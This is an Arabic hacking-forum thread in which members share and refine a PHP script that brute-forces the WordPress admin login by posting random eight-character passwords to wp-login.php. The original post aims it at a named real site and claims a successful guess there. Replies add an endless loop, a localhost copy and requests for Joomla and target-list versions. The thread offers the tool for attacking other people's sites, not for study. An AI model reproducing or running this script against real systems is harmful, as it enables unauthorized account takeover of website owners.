Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]

sTRANGE WORLd عضو مميز
  • شكراً: 39
  • تم شكره 201 مرة في 53 مشاركة

السلام عليكم بصراحه موب فاضي يبرمج اختبارات ولكن

هذا السكربت تم تطبيقه على wordpress وتم سدح الباسورد :biggrin:

السكربت فيه كلام كثير كثير

شغل السكربت وسلملي عليه
النتيجه

ok:http://naomimontgomery.net/v/wordpress/wp-login.php: [+] pass:s
error:http://naomimontgomery.net/v/wordpress/wp-login.php: [-] pass:g45w6
:biggrin:

كود PHP:
<?php
error_reporting
(0);
function 
generate_random($length 1)
{
$string;
$new_str_pattern "abcdefghijklmnopqrstuvwxyz123456789";
for (
$i 0$i $length$i++) {
$string .= $new_str_pattern{rand(064)};
}
return 
$string;
}
for (
$i 1$i <=1000000000000$i++) {
$yy generate_random(8);
$data  = array

(
'log'=>'admin','pwd'=>"$yy",'rememberme'=>'for ever','wp-

submit'
=>'Login','redirect_to'=>'''testcookie'=>1);
$yey "http://naomimontgomery.net/v/wordpress/wp-

login.php"
;
$ch curl_init();
curl_setopt($ch,CURLOPT_URL,$yey);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$hh curl_exec($ch);
curl_close($ch);
if(
eregi('<div id="login_error">',$hh)){
echo 
"error:$yey:   [-]      pass:$yy\n";
}else{
echo 
"ok:$yey:   [+]      pass:$yy\n";
}
}


?>
نريد تطوير

12 أعضاء قالوا شكراً لـ sTRANGE WORLd على المشاركة المفيدة:
[email protected] عضو جديد
  • شكراً: 0
  • تم شكره 9 مرة في 4 مشاركة

ممكن شرح لكيفية عمل السكريبت

sazer_2010 عضو مميز
  • شكراً: 347
  • تم شكره 93 مرة في 25 مشاركة

"ب هل يخمن الحروف الكبيتال مثل abcd و العلامات المميزة [email protected]##$%$%^ ?

s4udiT3rr0rist S4E Team
  • شكراً: 629
  • تم شكره 974 مرة في 377 مشاركة

ليت فيه منه لل joomla

توقيع

i-
Hmx-+On eht mic
p3rL
is My Lov3
المعرفة هي القوة ، وتقاسم المعرفة هي القوة المفقودة
knowledge is power, knowledge shared is power lost


x0Slotleet عضو مشرف للمنتدى
  • شكراً: 2218
  • تم شكره 3884 مرة في 1028 مشاركة

السلام عليكم

ضفت عليه شوية تعديلات

كود PHP:
 <?php
set_time_limit
(0);
error_reporting(0);
function 
generate_random($length 1)
{
$string;
$new_str_pattern "abcdefghijklmnopqrstuvwxyz123456789";
for (
$i 0$i $length$i++) {
$string .= $new_str_pattern{rand(064)};
}
return 
$string;
}
for (
$i 1$i <=1000000000000$i++) {
$yy generate_random(8);
$data  = array

(
'log'=>'admin','pwd'=>"$yy",'rememberme'=>'for ever','wp-

submit'
=>'Login','redirect_to'=>'''testcookie'=>1);
$yey "http://localhost/wordpress/wp-login.php";
$ch curl_init();
curl_setopt($ch,CURLOPT_URL,$yey);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$hh curl_exec($ch);
curl_close($ch);
if(
eregi('<div id="login_error">',$hh)){
echo 
"error:$yey:   [-]      pass:$yy <br>";
}else{
echo 
"<font color='red'>ok</font>:$yey:   [+]      pass:$yy <br>";
}
}
?>
السكربت رائع جدا يا صديق ض1

توقيع
one single vulnerability, all an attacker needs

awad2005 عضو جديد
  • شكراً: 0
  • تم شكره مرة واحدة في مشاركة واحدة

سكربت رائع اتمني تطويره

Dr.abolalh sec4ever
  • شكراً: 1817
  • تم شكره 1478 مرة في 320 مشاركة



السكريبت لو يتم عمل التالي فية راح يكون افضل

1:يعمل على جوملا +وريد بريس
2:يعمل على جلب ملف فية المواقع افضل من وضعه من السورس
3:فكرة عملية السكريبت جميلة صراحة

توقيع
(sec4ever)
RAB3OUN Ş4È´cΘđ3г
  • شكراً: 423
  • تم شكره 2824 مرة في 365 مشاركة

تعديل بسيط في مكان سطر

كود PHP:
for ($i 1$i <=1000000000000$i++) { 
تحوله
كود PHP:
while(1
سيشتغل بدون توقف

السكريبت ما يستعمل كل الإحتمالات
كل مرة يستعمل باس من 8 أحرف عشوائيا يعني إنتا وحظك

الأعضاء الذين قالوا شكراً لـ RAB3OUN على المشاركة المفيدة:
sTRANGE WORLd عضو مميز
  • شكراً: 39
  • تم شكره 201 مرة في 53 مشاركة

المشاركة الأصلية كتبت بواسطة اورنج مان اقتباس :
ليت فيه منه لل joomla

كم تعطيني فلوس
عدل على الحقول والخطاء واذا مانفع استعلم من حجم البايتات عند الخطاء والصح البايتات تختلف


بس انت عارف الشي

ام الاعضاء اللي ردو ردوكم مفيده واشركم على الافاده ان شاء الله يصير نفس اللي قلتو >
rab3oun>كلام سليم

Mr.Bo0oM عضو مميز
  • شكراً: 1080
  • تم شكره 96 مرة في 61 مشاركة

المشاركة الأصلية كتبت بواسطة [email protected] اقتباس :
ممكن شرح لكيفية عمل السكريبت
أنصحك تتعلم لغة php اقل شي 55% وراح تعرف تعدل و احتمال تصنع

تحياتي

الأعضاء الذين قالوا شكراً لـ Mr.Bo0oM على المشاركة المفيدة: